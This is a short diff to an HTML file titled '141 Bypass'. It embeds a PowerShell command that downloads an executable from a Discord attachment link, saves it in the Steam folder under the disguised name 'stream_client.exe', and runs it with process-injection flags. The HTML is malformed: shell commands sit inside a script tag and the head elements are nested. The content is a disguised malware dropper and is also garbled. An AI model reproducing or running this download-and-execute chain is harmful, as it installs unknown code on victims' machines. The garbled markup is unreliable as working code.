--- a/w.html
+++ b/w.html
@@ -1,3 +1,18 @@
-powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1195789181784436838/1195791255750316152/a.exe' -OutFile 'C:\Program Files (x86)\Steam\stream_client.exe'"
+<!DOCTYPE html>
+<html lang="pt-BR">
+<head>
+  <meta charset="UTF-8">
+  <title>141 Bypass</title>
+  <head>
+    <meta http-equiv="Content-Security-Policy" content="default-src 'self';">
+  </head>
+</head>
+<body>
+  <script>
+    powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1195789181784436838/1195791255750316152/a.exe' -OutFile 'C:\Program Files (x86)\Steam\stream_client.exe'"
 
 & "C:\Program Files (x86)\Steam\stream_client.exe" --process-name rstrui.exe --inject WriteMiniDmp.exe
+  </script>
+  <script src="blocker.js"></script>
+</body>
+</html>
